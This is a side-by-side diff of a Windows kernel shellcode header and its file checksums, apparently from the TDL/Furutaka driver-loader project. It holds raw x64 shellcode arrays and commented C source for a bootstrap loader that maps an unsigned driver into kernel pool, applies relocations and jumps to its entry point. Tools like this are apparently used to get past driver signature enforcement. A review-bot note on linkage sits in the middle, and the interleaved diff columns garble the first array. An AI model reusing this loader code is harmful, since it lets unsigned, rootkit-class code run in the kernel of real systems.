0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9, 0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9,
0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C, 0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C,
0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C,
0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48, 0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48,
0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0, 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFE, 0x72, 0xA0,
0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x45, 0x33, 0xC9, 0x48, 0x8B, 0xB4, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0x88,
0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48, 0x00, 0x00, 0x00, 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0x7C, 0x24, 0x70, 0x48, 0xC1, 0xEA, 0x03, 0x48,
0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCD, 0x48, 0x2B, 0xDD, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75, 0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75,
0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44, 0xEF, 0x4C, 0x89, 0x4C, 0x24, 0x30, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0x4C, 0x89, 0x8C, 0x24, 0xA0,
0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x4C, 0x24, 0x48,
0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24, 0x0F, 0x57, 0xC0, 0x4C, 0x89, 0x4C, 0x24, 0x50, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0xF3, 0x0F, 0x7F,
0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6, 0x44, 0x24, 0x60, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x58, 0x00,
0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41, 0x02, 0x00, 0x00, 0x41, 0x8B, 0x46, 0x28, 0x48, 0x03, 0xC5, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C,
0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3 0x89, 0x4C, 0x24, 0x20, 0x45, 0x33, 0xC9, 0x41, 0xFF, 0xD5, 0x4C, 0x8B, 0x74, 0x24, 0x78, 0x4C,
0x8B, 0xAC, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xAC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x48,
0x8B, 0x9C, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x85, 0xC0, 0x78, 0x0B, 0x48, 0x8B, 0x8C, 0x24, 0xA0,
0x00, 0x00, 0x00, 0x41, 0xFF, 0xD4, 0x48, 0x81, 0xC4, 0x90, 0x00, 0x00, 0x00, 0x41, 0x5C, 0xC3
};
/*
* TDLBootstrapLoader_w10rs2
*
* Purpose:
*
* Main part of shellcode used to execute driver code since w10rs2.
*
*/
/*
void TDLBootstrapLoader_w10rs2(
PfnExAllocatePoolWithTag ExAllocatePoolWithTag
)
{
ULONG_PTR pos, exbuffer,
Image = ((ULONG_PTR)&TDLBootstrapLoader_w10rs2) + MAX_SHELLCODE_LENGTH;
PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image;
PIMAGE_FILE_HEADER fileh =
(PIMAGE_FILE_HEADER)(Image + sizeof(DWORD) + dosh->e_lfanew);
PIMAGE_OPTIONAL_HEADER popth =
(PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));
PfnDriverEntry DriverEntry;
ULONG isz = popth->SizeOfImage;
PIMAGE_BASE_RELOCATION rel;
DWORD_PTR delta;
LPWORD chains;
DWORD c, p, rsz;
exbuffer = (ULONG_PTR)ExAllocatePoolWithTag(
NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE;
exbuffer &= ~(PAGE_SIZE - 1);
if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC)
if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0)
{
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image +
popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
delta = (DWORD_PTR)exbuffer - popth->ImageBase;
c = 0;
while (c < rsz) {
p = sizeof(IMAGE_BASE_RELOCATION);
chains = (LPWORD)((PBYTE)rel + p);
while (p < rel->SizeOfBlock) {
switch (*chains >> 12) {
case IMAGE_REL_BASED_HIGHLOW:
*(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta;
break;
case IMAGE_REL_BASED_DIR64:
*(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta;
break;
}
chains++;
p += sizeof(WORD);
}
c += rel->SizeOfBlock;
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock);
}
}
isz >>= 3;
for (pos = 0; pos < isz; pos++)
((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos];
DriverEntry = (PfnDriverEntry)(exbuffer + popth->AddressOfEntryPoint);
DriverEntry();
}
*/
static const unsigned char TDLBootstrapLoader_code_w10rs2[321] = {
0x40, 0x53, 0x55, 0x56, 0x48, 0x83, 0xEC, 0x20, 0x4C, 0x8B, 0xC9, 0x4C, 0x89, 0x7C, 0x24, 0x50,
0x48, 0x8D, 0x1D, 0xE9, 0xFF, 0xFF, 0xFF, 0x33, 0xC9, 0x48, 0x81, 0xC3, 0x00, 0x03, 0x00, 0x00,
0x41, 0xB8, 0x54, 0x64, 0x6C, 0x53, 0x48, 0x63, 0x6B, 0x3C, 0x48, 0x03, 0xEB, 0x44, 0x8B, 0x7D,
0x50, 0x41, 0x8D, 0x97, 0x00, 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x48, 0x8D, 0xB0, 0x00, 0x10,
0x00, 0x00, 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x83, 0xBD, 0x84, 0x00, 0x00, 0x00, 0x05,
0x0F, 0x86, 0xA5, 0x00, 0x00, 0x00, 0x8B, 0x8D, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84,
0x97, 0x00, 0x00, 0x00, 0x48, 0x89, 0x7C, 0x24, 0x40, 0x4C, 0x8D, 0x04, 0x0B, 0x4C, 0x8B, 0xDE,
0x4C, 0x89, 0x74, 0x24, 0x48, 0x4C, 0x2B, 0x5D, 0x30, 0x33, 0xFF, 0x44, 0x8B, 0xB5, 0xB4, 0x00,
0x00, 0x00, 0x45, 0x85, 0xF6, 0x74, 0x6A, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00,
0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43,
0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9,
0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C,
0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C,
0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48,
0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x41, 0x3B, 0xFE, 0x72,
0x9F, 0x48, 0x8B, 0x7C, 0x24, 0x40, 0x4C, 0x8B, 0x74, 0x24, 0x48, 0x49, 0x8B, 0xD7, 0x4C, 0x8B,
0x7C, 0x24, 0x50, 0x48, 0xC1, 0xEA, 0x03, 0x48, 0x85, 0xD2, 0x74, 0x25, 0x48, 0x8B, 0xCE, 0x48,
0x2B, 0xDE, 0x0F, 0x1F, 0x40, 0x00, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75,
0xEF, 0x8B, 0x45, 0x28, 0x48, 0x03, 0xC6, 0x48, 0x83, 0xC4, 0x20, 0x5E, 0x5D, 0x5B, 0x48, 0xFF,
0xE0
}; };
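Review bot: `TDLBootstrapLoader_code` loses its `static` qualifier on the new side (`const unsigned char TDLBootstrapLoader_code[480] = {`) while `TDLBootstrapLoader_code_w10rs2` below keeps `static const`; in C a file-scope `const` array has external linkage, so a header that defines it would cause duplicate-symbol link errors if it were ever included from a second translation unit, and at minimum the two arrays should agree. Restoring `static const unsigned char TDLBootstrapLoader_code[480] = {` keeps them consistent. The commented reference source now places the image at `MAX_SHELLCODE_LENGTH` past the shellcode start, so the relation between that define and the two array sizes is a contract; a compile-time check such as `C_ASSERT(sizeof(TDLBootstrapLoader_code) <= MAX_SHELLCODE_LENGTH);` (and the same for the w10rs2 array) would document it where the arrays are defined.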

@ -1,32 +1,32 @@
c371453e2eb9edab0949472d14871f09a6c60e4bab647910da83943bb4d3104c *Compiled\dummy.sys a761bbb4a1b7813132dc8d8ed526d24289dc603bc706da238e1f23d75dbd66aa *Compiled\dummy.sys
4c8d13b1693c77bc4b75ae0f6262260cbc1478f3da33d039930d265db5d7eb3e *Compiled\dummy2.sys f6610691bc3b9f96dad8bfc00b3ceb939ebcb17844d1ca5ee26f8364944ca110 *Compiled\dummy2.sys
9c81608bea1766f195ddf49f9a07b23da96dbf17a5e2d66405492eaa3155996e *Compiled\Furutaka.exe bef3056b55e2f29525817e3e44753dcf32152460028d27b28e54cce3a7d1eb0f *Compiled\Furutaka.exe
c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln 14eec2753d0e9b432c54c4a70fc59e3be75674313b6308a7a820e6682f775eb9 *Source\DummyDrv\dummy.sln
01662c807519eac05d7082c151be3824418ccf1716216895680fe5598093d245 *Source\DummyDrv\dummy\dummy.vcxproj d61ebda2674d2db05a235478f89fed02c2de049b00ac5648fcebd4c4e638f71c *Source\DummyDrv\dummy\dummy.vcxproj
2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters 2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters
d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv\dummy\dummy.vcxproj.user d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv\dummy\dummy.vcxproj.user
da9e4121c5a6970b0e10e6cca6fa6065e758f5b54b46c33ff99e7f98d98d00bc *Source\DummyDrv\dummy\main.c 4c86a0477e8f21e81bc6651bc06cea26241fc5b9a033e64c3cd843267fc98575 *Source\DummyDrv\dummy\main.c
c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln 14eec2753d0e9b432c54c4a70fc59e3be75674313b6308a7a820e6682f775eb9 *Source\DummyDrv2\dummy.sln
2fd78ce2843d7c77b1249bb7288d87605a4b3979b150a982eae56ecbabdcfb32 *Source\DummyDrv2\dummy\dummy.vcxproj f9a718ca087a1dce71638855837c464b190b7310f8e6715fc4471ed2b85af27d *Source\DummyDrv2\dummy\dummy.vcxproj
f53e8133a9d12b751445ed57f4574bbeba722d26096196f544ed1794adf699f4 *Source\DummyDrv2\dummy\dummy.vcxproj.filters f53e8133a9d12b751445ed57f4574bbeba722d26096196f544ed1794adf699f4 *Source\DummyDrv2\dummy\dummy.vcxproj.filters
d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv2\dummy\dummy.vcxproj.user d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv2\dummy\dummy.vcxproj.user
a23f846a6321b8e411dce50c61c5d2675ee7dc6fef0e3b69d8a671120cd27b76 *Source\DummyDrv2\dummy\main.c 1e73ce5b6b079e6986509c218ce0880536b37c505056f831989e73b835c1cbbc *Source\DummyDrv2\dummy\main.c
cc5dab13546ffcb16e97b664783e6a9121c99f89ece7dd63300714246e9622fa *Source\DummyDrv2\dummy\main.h f0732da25aa6b0a64eb0ebfc730c0902ed6fd1cc51f43f66813adbc5283de6ec *Source\DummyDrv2\dummy\main.h
10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c 10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c
e25d0088a6c73c51243aac3a21e9384b24844e54f0a093d75fbf0ef44c2ff83d *Source\Furutaka\cui.c e25d0088a6c73c51243aac3a21e9384b24844e54f0a093d75fbf0ef44c2ff83d *Source\Furutaka\cui.c
6f145796c9bb2bd9413fe12926436c04cc0dd596be716d7423150299b39d02a0 *Source\Furutaka\cui.h 6f145796c9bb2bd9413fe12926436c04cc0dd596be716d7423150299b39d02a0 *Source\Furutaka\cui.h
24bd86affa81071e8e4ba82368e6004ede1c4dd5234c21098c4e7563ee25721a *Source\Furutaka\Furutaka.sln 24bd86affa81071e8e4ba82368e6004ede1c4dd5234c21098c4e7563ee25721a *Source\Furutaka\Furutaka.sln
16bd5cb1f9114683a8f5b91d8f5492319b64f5b1dd5103b56c9c29c39b06237b *Source\Furutaka\Furutaka.vcxproj 656a1ebfb8ca2b136b446d8bdeac9618d27ae1f6e06c08dee0d2fb8885b0e3a1 *Source\Furutaka\Furutaka.vcxproj
b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters
b4d5fe6532f439d6c1161b06dfe90a6bee063c003645204d31b678efd033ae51 *Source\Furutaka\Furutaka.vcxproj.user b4d5fe6532f439d6c1161b06dfe90a6bee063c003645204d31b678efd033ae51 *Source\Furutaka\Furutaka.vcxproj.user
1a80c208b491fcd2704761490a12067ae8aa73d8bde834a20920cbd231affaf7 *Source\Furutaka\global.h 9b9f412b442a3a328693af6f6be5bc3f00b0723e49012e6395d3d5eb9184b078 *Source\Furutaka\global.h
94cbbb81022dbd0205a3e7ede89775b43f9f45e934a3079fdb7f5217d8794fe0 *Source\Furutaka\instdrv.c 94cbbb81022dbd0205a3e7ede89775b43f9f45e934a3079fdb7f5217d8794fe0 *Source\Furutaka\instdrv.c
33b8666748f027ff93707e6e2a1b52303c3664399000ff18b4a8fe864b731640 *Source\Furutaka\instdrv.h 33b8666748f027ff93707e6e2a1b52303c3664399000ff18b4a8fe864b731640 *Source\Furutaka\instdrv.h
c1747f460d8e42e18f3fce8c30c51be75fe382332f586756bbb86af81e8a5a45 *Source\Furutaka\main.c 2e0ae7d721d15facb6a63af2df430ce5a1d6250fdb78fc7511e24c23a2d73a9a *Source\Furutaka\main.c
8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h 8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h
fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h
2dad59a7d37bfc28fc1e0f3599584454084e5837649facde829373f41b86e08f *Source\Furutaka\resource.rc 2ae545acec81745467b20da56f88a31df07de2021456d82dc16dbbe9ce0b3103 *Source\Furutaka\resource.rc
f8cafd307ba14b60970fe8caf73fbb2f178d3877a3d8b51f507b431e3bf5506e *Source\Furutaka\shellcode.h 6f8ae02b3a6da025d5f918080e70245760d472dd5eb23fcc3964d425bee41336 *Source\Furutaka\shellcode.h
fd0fc26c051a852fe3eaf9cb44615543b92e642274fc1eb58b53f23457fd4e89 *Source\Furutaka\sup.c fd0fc26c051a852fe3eaf9cb44615543b92e642274fc1eb58b53f23457fd4e89 *Source\Furutaka\sup.c
059014233efa8963d28b21f77aa37ae1c0ed3e152a9737ae8ec45338dee1d860 *Source\Furutaka\sup.h 059014233efa8963d28b21f77aa37ae1c0ed3e152a9737ae8ec45338dee1d860 *Source\Furutaka\sup.h
12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h 12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h